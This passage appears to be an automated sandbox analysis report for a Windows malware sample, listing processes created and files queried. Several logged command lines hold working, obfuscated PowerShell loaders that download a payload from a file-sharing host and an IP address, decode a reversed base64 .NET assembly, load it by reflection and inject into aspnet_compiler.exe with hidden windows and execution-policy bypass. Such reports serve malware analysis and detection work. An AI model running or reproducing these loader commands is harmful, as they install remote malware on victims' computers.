0aXZhZG9HZEgsR2RIMUdkSCxHZEhkZXNhdGl2YWRvR2RIKSk7JyktY1JlcGxhQ2UgIChbQ0hhUl03MStbQ0hhUl0xMDArW0NIYVJdNzIpLFtDSGFSXTM5LWNSZXBsYUNlIChbQ0hhUl0xMTQrW0NIYVJdMTAxK1tDSGFSXTgyKSxbQ0hhUl0xMjQgLWNSZXBsYUNlIChbQ0hhUl03OStbQ0hhUl03NCtbQ0hhUl04MCksW0NIYVJdMzYpfC4gKCAkc2hlbGxpRFsxXSskU0hFTGxpZFsxM10rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('OJPimageUrl = GdHhttps://3105.filemail.com/api/file/get?filek'+'ey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4'+'tnxlA'+'VbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c'+'9bfb9571732531309b5ff7c G'+'dH;OJPwebClient = New-Object System.Net'+'.WebClient;OJ'+'Pima'+'geBytes = OJPwebClient.DownloadData(OJPimageUrl);OJPimageText = [System.Text.Enc'+'odin'+'g]::UTF8.GetString(OJPimageBytes);OJPstartFlag = GdH<<BASE64_START>>GdH;O'+'JPendFlag = GdH<<BASE64_END>>GdH;OJPstartIndex = OJPimageText.In'+'dexOf(OJPstartFlag);OJPendIndex = OJPimageText.In'+'dexOf(OJPendFlag);OJPstartIndex -ge 0 -and OJPendIndex -gt'+' OJPstartIndex;OJPstartIndex += OJPstartFlag.Length;OJPbase64Length = OJPendIndex - OJPs'+'tartIndex;OJPbase64Command = '+'OJPimageText.Substring(OJPstartIndex, OJPbase64Length)'+';OJPbase64Reversed = -jo'+'in (OJPbase64Command.ToCharArray() reR ForEach-Object { OJP_ })[-1..-(OJPbase64Command.Length)];OJPcommandBytes = [System.Convert]::FromBase64String(OJPbase64Reversed);OJPloadedAssembly = [System.Reflection.Assembly]::Load(OJPcomm'+'andBytes);OJPvaiMethod = [dnlib.IO.Home].GetMethod(GdHV'+'AIGdH);OJPvaiMe'+'thod.Invoke(OJPnull, @(GdHtxt.AMMRC/0511/452.55'+'1.07.641//:ptthG'+'dH, '+'GdHdesati'+'vadoGdH, GdHdesativadoGdH, GdHdesativadoGdH, GdHaspnet_compilerGdH, GdHdesativadoGdH, GdHdesativadoGdH,GdHdesativadoGdH,GdHdesativadoGdH,GdHdesati'+'vadoGdH,'+'GdHdesativadoGdH,GdHdesativadoGdH,GdH1GdH,GdHdesativadoGdH));')-cReplaCe ([CHaR]71+[CHaR]100+[CHaR]72),[CHaR]39-cReplaCe ([CHaR]114+[CHaR]101+[CHaR]82),[CHaR]124 -cReplaCe ([CHaR]79+[CHaR]74+[CHaR]80),[CHaR]36)|. ( $shelliD[1]+$SHELlid[13]+'x')"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeProcess created: C:\Windows\SysWOW64\cleanmgr.exe "C:\Windows\SysWOW64\cleanmgr.exe"
                    Source: C:\Windows\SysWOW64\cleanmgr.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jgvzylfrylrxicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrklxr5ueugicagicagicagicagicagicagicagicagicagicagicaglw1lbujlcmrfzkloaxrpt24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvsbe1vbi5kbgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagigrlyk1ut2lglhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbqlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicb5zkvqsg9vthusdwludcagicagicagicagicagicagicagicagicagicagicagicbgexntuvrxleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbbz04poycgicagicagicagicagicagicagicagicagicagicagicaglu5btwugicagicagicagicagicagicagicagicagicagicagicagimdus3dxqyigicagicagicagicagicagicagicagicagicagicagicaglu5btwvtcefdrsagicagicagicagicagicagicagicagicagicagicagicbvwlygicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakzvliuvfivhe6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xndyunzaumtu1lji1nc8xmtuwl2nyzwf0zwfizxr0zxjidxr0zxjzbw9vdghzbw9vdgh5a2luz3n0b2dldg1lc3dlzwv0bmvzcy50suyilcikrw52okfquerbvefcy3jlyxrlywjldhrlcmj1dhrlcnntb290ahntb290ahlraw5nc3rvz2v0bwvzdy52qnmildasmck7c3rbclqtu0xfrxaomyk7awv4icagicagicagicagicagicagicagicagicagicagicagicikzw52okfquerbvefcy3jlyxrlywjldhrlcmj1dhrlcnntb290ahntb290ahlraw5nc3rvz2v0bwvzdy52qnmi'+[char]34+'))')))"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnt0pqaw1hz2vvcmwgpsbhzehodhrwczovlzmxmduuzmlszw1hawwuy29tl2fwas9mawxll2dldd9mawxlaycrj2v5pxnovfbiyknqwdhvlwxpdenxsexhnl8ween5lxhsnccrj3ruegxbjysnvmjrotutzhzpves1y0fsyu5kuwpiyjntzxhmd1f6s21uwgcmc2tpchjlzz10cnvljnbrx3zpzd1lmdewotyzogmnkyc5ymziotu3mtczmjuzmtmwowi1zmy3yybhjysnzeg7t0pqd2viq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0jysnlldlyknsawvuddtpsicrj1bpbwenkydnzuj5dgvzid0gt0pqd2viq2xpzw50lkrvd25sb2fkrgf0yshpslbpbwfnzvvybck7t0pqaw1hz2vuzxh0id0gw1n5c3rlbs5uzxh0lkvuyycrj29kaw4nkydnxto6vvrgoc5hzxrtdhjpbmcot0pqaw1hz2vcexrlcyk7t0pqc3rhcnrgbgfnid0gr2ripdxcqvnfnjrfu1rbulq+pkdksdtpjysnslblbmrgbgfnid0gr2ripdxcqvnfnjrfru5epj5hzeg7t0pqc3rhcnrjbmrleca9ie9kugltywdlvgv4dc5jbicrj2rlee9mke9kuhn0yxj0rmxhzyk7t0pqzw5ksw5kzxggpsbpslbpbwfnzvrlehqusw4nkydkzxhpzihpslblbmrgbgfnkttpslbzdgfydeluzgv4ic1nzsawic1hbmqgt0pqzw5ksw5kzxgglwd0jysnie9kuhn0yxj0sw5kzxg7t0pqc3rhcnrjbmrlecarpsbpslbzdgfydezsywcutgvuz3roo09kugjhc2u2nexlbmd0aca9ie9kugvuzeluzgv4ic0gt0pqcycrj3rhcnrjbmrledtpslbiyxnlnjrdb21tyw5kid0gjysnt0pqaw1hz2vuzxh0lln1ynn0cmluzyhpslbzdgfydeluzgv4lcbpslbiyxnlnjrmzw5ndggpjysno09kugjhc2u2nfjldmvyc2vkid0glwpvjysnaw4gke9kugjhc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksbyzvigrm9yrwfjac1pymply3qgeybpslbfih0pwy0xli4tke9kugjhc2u2nenvbw1hbmqutgvuz3rokv07t0pqy29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzyhpslbiyxnlnjrszxzlcnnlzck7t0pqbg9hzgvkqxnzzw1ibhkgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkke9kugnvbw0nkydhbmrcexrlcyk7t0pqdmfptwv0ag9kid0gw2rubglilklplkhvbwvdlkdlde1ldghvzchhzehwjysnqulhzegpo09kuhzhau1ljysndghvzc5jbnzva2uot0pqbnvsbcwgqchhzeh0ehququ1nukmvmduxms80ntiuntunkycxlja3ljy0ms8vonb0dghhjysnzegsiccrj0dksgrlc2f0ascrj3zhzg9hzegsiedksgrlc2f0axzhzg9hzegsiedksgrlc2f0axzhzg9hzegsiedksgfzcg5ldf9jb21wawxlckdkscwgr2rizgvzyxrpdmfkb0dkscwgr2rizgvzyxrpdmfkb0dkscxhzehkzxnhdgl2ywrvr2riledksgrlc2f0axzhzg9hzegsr2rizgvzyxrpjysndmfkb0dkscwnkydhzehkzxnhdgl2ywrvr2riledksgrlc2f0axzhzg9hzegsr2rimudkscxhzehkzxnhdgl2ywrvr2riksk7jykty1jlcgxhq2ugichbq0hhul03mstbq0hhul0xmdarw0niyvjdnziplftdsgfsxtm5lwnszxbsyunlichbq0hhul0xmtqrw0niyvjdmtaxk1tdsgfsxtgyksxbq0hhul0xmjqglwnszxbsyunlichbq0hhul03ostbq0hhul03nctbq0hhul04mcksw0niyvjdmzypfc4gkcakc2hlbgxprfsxxssku0hftgxpzfsxm10rj3gnkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('ojpimageurl = gdhhttps://3105.filemail.com/api/file/get?filek'+'ey=shtphbcpx8o-lotcqhlg6_0xcy-xl4'+'tnxla'+'vbq95-dvitk5carandqjbb3mexfwqzkmtxg&skipreg=true&pk_vid=e0109638c'+'9bfb9571732531309b5ff7c g'+'dh;ojpwebclient = new-object system.net'+'.webclient;oj'+'pima'+'gebytes = ojpwebclient.downloaddata(ojpimageurl);ojpimagetext = [system.text.enc'+'odin'+'g]::utf8.getstring(ojpimagebytes);ojpstartflag = gdh<<base64_start>>gdh;o'+'jpendflag = gdh<<base64_end>>gdh;ojpstartindex = ojpimagetext.in'+'dexof(ojpstartflag);ojpendindex = ojpimagetext.in'+'dexof(ojpendflag);ojpstartindex -ge 0 -and ojpendindex -gt'+' ojpstartindex;ojpstartindex += ojpstartflag.length;ojpbase64length = ojpendindex - ojps'+'tartindex;ojpbase64command = '+'ojpimagetext.substring(ojpstartindex, ojpbase64length)'+';ojpbase64reversed = -jo'+'in (ojpbase64command.tochararray() rer foreach-object { ojp_ })[-1..-(ojpbase64command.length)];ojpcommandbytes = [system.convert]::frombase64string(ojpbase64reversed);ojploadedassembly = [system.reflection.assembly]::load(ojpcomm'+'andbytes);ojpvaimethod = [dnlib.io.home].getmethod(gdhv'+'aigdh);ojpvaime'+'thod.invoke(ojpnull, @(gdhtxt.ammrc/0511/452.55'+'1.07.641//:ptthg'+'dh, '+'gdhdesati'+'vadogdh, gdhdesativadogdh, gdhdesativadogdh, gdhaspnet_compilergdh, gdhdesativadogdh, gdhdesativadogdh,gdhdesativadogdh,gdhdesativadogdh,gdhdesati'+'vadogdh,'+'gdhdesativadogdh,gdhdesativadogdh,gdh1gdh,gdhdesativadogdh));')-creplace ([char]71+[char]100+[char]72),[char]39-creplace ([char]114+[char]101+[char]82),[char]124 -creplace ([char]79+[char]74+[char]80),[char]36)|. ( $shellid[1]+$shellid[13]+'x')"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jgvzylfrylrxicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrklxr5ueugicagicagicagicagicagicagicagicagicagicagicaglw1lbujlcmrfzkloaxrpt24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvsbe1vbi5kbgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagigrlyk1ut2lglhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbqlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicb5zkvqsg9vthusdwludcagicagicagicagicagicagicagicagicagicagicagicbgexntuvrxleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbbz04poycgicagicagicagicagicagicagicagicagicagicagicaglu5btwugicagicagicagicagicagicagicagicagicagicagicagimdus3dxqyigicagicagicagicagicagicagicagicagicagicagicaglu5btwvtcefdrsagicagicagicagicagicagicagicagicagicagicagicbvwlygicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakzvliuvfivhe6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xndyunzaumtu1lji1nc8xmtuwl2nyzwf0zwfizxr0zxjidxr0zxjzbw9vdghzbw9vdgh5a2luz3n0b2dldg1lc3dlzwv0bmvzcy50suyilcikrw52okfquerbvefcy3jlyxrlywjldhrlcmj1dhrlcnntb290ahntb290ahlraw5nc3rvz2v0bwvzdy52qnmildasmck7c3rbclqtu0xfrxaomyk7awv4icagicagicagicagicagicagicagicagicagicagicagicikzw52okfquerbvefcy3jlyxrlywjldhrlcmj1dhrlcnntb290ahntb290ahlraw5nc3rvz2v0bwvzdy52qnmi'+[char]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnt0pqaw1hz2vvcmwgpsbhzehodhrwczovlzmxmduuzmlszw1hawwuy29tl2fwas9mawxll2dldd9mawxlaycrj2v5pxnovfbiyknqwdhvlwxpdenxsexhnl8ween5lxhsnccrj3ruegxbjysnvmjrotutzhzpves1y0fsyu5kuwpiyjntzxhmd1f6s21uwgcmc2tpchjlzz10cnvljnbrx3zpzd1lmdewotyzogmnkyc5ymziotu3mtczmjuzmtmwowi1zmy3yybhjysnzeg7t0pqd2viq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0jysnlldlyknsawvuddtpsicrj1bpbwenkydnzuj5dgvzid0gt0pqd2viq2xpzw50lkrvd25sb2fkrgf0yshpslbpbwfnzvvybck7t0pqaw1hz2vuzxh0id0gw1n5c3rlbs5uzxh0lkvuyycrj29kaw4nkydnxto6vvrgoc5hzxrtdhjpbmcot0pqaw1hz2vcexrlcyk7t0pqc3rhcnrgbgfnid0gr2ripdxcqvnfnjrfu1rbulq+pkdksdtpjysnslblbmrgbgfnid0gr2ripdxcqvnfnjrfru5epj5hzeg7t0pqc3rhcnrjbmrleca9ie9kugltywdlvgv4dc5jbicrj2rlee9mke9kuhn0yxj0rmxhzyk7t0pqzw5ksw5kzxggpsbpslbpbwfnzvrlehqusw4nkydkzxhpzihpslblbmrgbgfnkttpslbzdgfydeluzgv4ic1nzsawic1hbmqgt0pqzw5ksw5kzxgglwd0jysnie9kuhn0yxj0sw5kzxg7t0pqc3rhcnrjbmrlecarpsbpslbzdgfydezsywcutgvuz3roo09kugjhc2u2nexlbmd0aca9ie9kugvuzeluzgv4ic0gt0pqcycrj3rhcnrjbmrledtpslbiyxnlnjrdb21tyw5kid0gjysnt0pqaw1hz2vuzxh0lln1ynn0cmluzyhpslbzdgfydeluzgv4lcbpslbiyxnlnjrmzw5ndggpjysno09kugjhc2u2nfjldmvyc2vkid0glwpvjysnaw4gke9kugjhc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksbyzvigrm9yrwfjac1pymply3qgeybpslbfih0pwy0xli4tke9kugjhc2u2nenvbw1hbmqutgvuz3rokv07t0pqy29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzyhpslbiyxnlnjrszxzlcnnlzck7t0pqbg9hzgvkqxnzzw1ibhkgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkke9kugnvbw0nkydhbmrcexrlcyk7t0pqdmfptwv0ag9kid0gw2rubglilklplkhvbwvdlkdlde1ldghvzchhzehwjysnqulhzegpo09kuhzhau1ljysndghvzc5jbnzva2uot0pqbnvsbcwgqchhzeh0ehququ1nukmvmduxms80ntiuntunkycxlja3ljy0ms8vonb0dghhjysnzegsiccrj0dksgrlc2f0ascrj3zhzg9hzegsiedksgrlc2f0axzhzg9hzegsiedksgrlc2f0axzhzg9hzegsiedksgfzcg5ldf9jb21wawxlckdkscwgr2rizgvzyxrpdmfkb0dkscwgr2rizgvzyxrpdmfkb0dkscxhzehkzxnhdgl2ywrvr2riledksgrlc2f0axzhzg9hzegsr2rizgvzyxrpjysndmfkb0dkscwnkydhzehkzxnhdgl2ywrvr2riledksgrlc2f0axzhzg9hzegsr2rimudkscxhzehkzxnhdgl2ywrvr2riksk7jykty1jlcgxhq2ugichbq0hhul03mstbq0hhul0xmdarw0niyvjdnziplftdsgfsxtm5lwnszxbsyunlichbq0hhul0xmtqrw0niyvjdmtaxk1tdsgfsxtgyksxbq0hhul0xmjqglwnszxbsyunlichbq0hhul03ostbq0hhul03nctbq0hhul04mcksw0niyvjdmzypfc4gkcakc2hlbgxprfsxxssku0hftgxpzfsxm10rj3gnkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('ojpimageurl = gdhhttps://3105.filemail.com/api/file/get?filek'+'ey=shtphbcpx8o-lotcqhlg6_0xcy-xl4'+'tnxla'+'vbq95-dvitk5carandqjbb3mexfwqzkmtxg&skipreg=true&pk_vid=e0109638c'+'9bfb9571732531309b5ff7c g'+'dh;ojpwebclient = new-object system.net'+'.webclient;oj'+'pima'+'gebytes = ojpwebclient.downloaddata(ojpimageurl);ojpimagetext = [system.text.enc'+'odin'+'g]::utf8.getstring(ojpimagebytes);ojpstartflag = gdh<<base64_start>>gdh;o'+'jpendflag = gdh<<base64_end>>gdh;ojpstartindex = ojpimagetext.in'+'dexof(ojpstartflag);ojpendindex = ojpimagetext.in'+'dexof(ojpendflag);ojpstartindex -ge 0 -and ojpendindex -gt'+' ojpstartindex;ojpstartindex += ojpstartflag.length;ojpbase64length = ojpendindex - ojps'+'tartindex;ojpbase64command = '+'ojpimagetext.substring(ojpstartindex, ojpbase64length)'+';ojpbase64reversed = -jo'+'in (ojpbase64command.tochararray() rer foreach-object { ojp_ })[-1..-(ojpbase64command.length)];ojpcommandbytes = [system.convert]::frombase64string(ojpbase64reversed);ojploadedassembly = [system.reflection.assembly]::load(ojpcomm'+'andbytes);ojpvaimethod = [dnlib.io.home].getmethod(gdhv'+'aigdh);ojpvaime'+'thod.invoke(ojpnull, @(gdhtxt.ammrc/0511/452.55'+'1.07.641//:ptthg'+'dh, '+'gdhdesati'+'vadogdh, gdhdesativadogdh, gdhdesativadogdh, gdhaspnet_compilergdh, gdhdesativadogdh, gdhdesativadogdh,gdhdesativadogdh,gdhdesativadogdh,gdhdesati'+'vadogdh,'+'gdhdesativadogdh,gdhdesativadogdh,gdh1gdh,gdhdesativadogdh));')-creplace ([char]71+[char]100+[char]72),[char]39-creplace ([char]114+[char]101+[char]82),[char]124 -creplace ([char]79+[char]74+[char]80),[char]36)|. ( $shellid[1]+$shellid[13]+'x')"Jump to behavior
                    Source: TjxlUxenxgDChq.exe, 0000000E.00000002.2573448078.0000000001181000.00000002.00000001.00040000.00000000.sdmp, TjxlUxenxgDChq.exe, 0000000E.00000000.1750916603.0000000001181000.00000002.00000001.00040000.00000000.sdmp, TjxlUxenxgDChq.exe, 00000012.00000000.1900654808.0000000001381000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                    Source: TjxlUxenxgDChq.exe, 0000000E.00000002.2573448078.0000000001181000.00000002.00000001.00040000.00000000.sdmp, TjxlUxenxgDChq.exe, 0000000E.00000000.1750916603.0000000001181000.00000002.00000001.00040000.00000000.sdmp, TjxlUxenxgDChq.exe, 00000012.00000000.1900654808.0000000001381000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: TjxlUxenxgDChq.exe, 0000000E.00000002.2573448078.0000000001181000.00000002.00000001.00040000.00000000.sdmp, TjxlUxenxgDChq.exe, 0000000E.00000000.1750916603.0000000001181000.00000002.00000001.00040000.00000000.sdmp, TjxlUxenxgDChq.exe, 00000012.00000000.1900654808.0000000001381000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                    Source: TjxlUxenxgDChq.exe, 0000000E.00000002.2573448078.0000000001181000.00000002.00000001.00040000.00000000.sdmp, TjxlUxenxgDChq.exe, 0000000E.00000000.1750916603.0000000001181000.00000002.00000001.00040000.00000000.sdmp, TjxlUxenxgDChq.exe, 00000012.00000000.1900654808.0000000001381000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
